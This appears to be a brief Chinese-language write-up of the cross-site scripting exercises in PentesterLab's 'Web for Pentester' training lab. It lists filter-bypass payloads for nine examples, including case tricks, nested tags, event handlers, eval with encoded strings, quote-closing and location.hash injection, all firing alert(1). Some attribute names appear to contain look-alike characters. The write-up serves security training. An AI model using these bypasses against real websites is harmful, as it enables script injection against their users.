Ref:https://www.pentesterlab.com/exercises/web_for_pentester/
Dat:20140722
web for pentester是PentesterLib开发的众多渗透测试学习平台之一,通过该平台我们可以了解学习到常见的Web漏洞检测技术。
【Example 01】
无过滤
<script>alert(1)</script>
【Example 02】
大小写替换
<sCript>alert(1)</scRipt>
【Example 03】
多余属性
<script/b>alert(1)</script/a>
<sc<script>ript>alert(1)</scr</script>ipt>
【Example 04】
变换标签
<img οnerrοr=alert(1) src=a>
<a οnmοuseοver=alert(1)>
<div οnmοuseοver=alert(1)>
【Example 05】
EVAL
<script>eval('a\154ert(1)')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
标签变换+进制
<img οnerrοr=al\u0065rt(1) src=a>
【Example 06】
标签闭合
";alert(1);"
【Example 07】
标签闭合
';alert(1);'
【Example 08】
标签form属性利用
example8.php/" ><script>alert(1)</script><"
【Example 09】
location.hash利用
example9.php#<script>alert(1)</script>